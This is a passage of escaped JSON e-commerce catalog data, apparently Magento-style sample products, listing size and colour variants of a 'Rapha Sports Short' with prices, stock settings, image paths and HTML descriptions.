Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"907\":{\"sku\":\"MSH07-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-33-Black\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"908\":{\"sku\":\"MSH07-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-33-Blue\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"909\":{\"sku\":\"MSH07-33-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-33-Purple\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-33-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Purple\"},\"910\":{\"sku\":\"MSH07-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-34-Black\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"911\":{\"sku\":\"MSH07-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-34-Blue\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"912\":{\"sku\":\"MSH07-34-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-34-Purple\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-34-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Purple\"},\"913\":{\"sku\":\"MSH07-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-36-Black\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"914\":{\"sku\":\"MSH07-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-36-Blue\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"915\":{\"sku\":\"MSH07-36-Purple\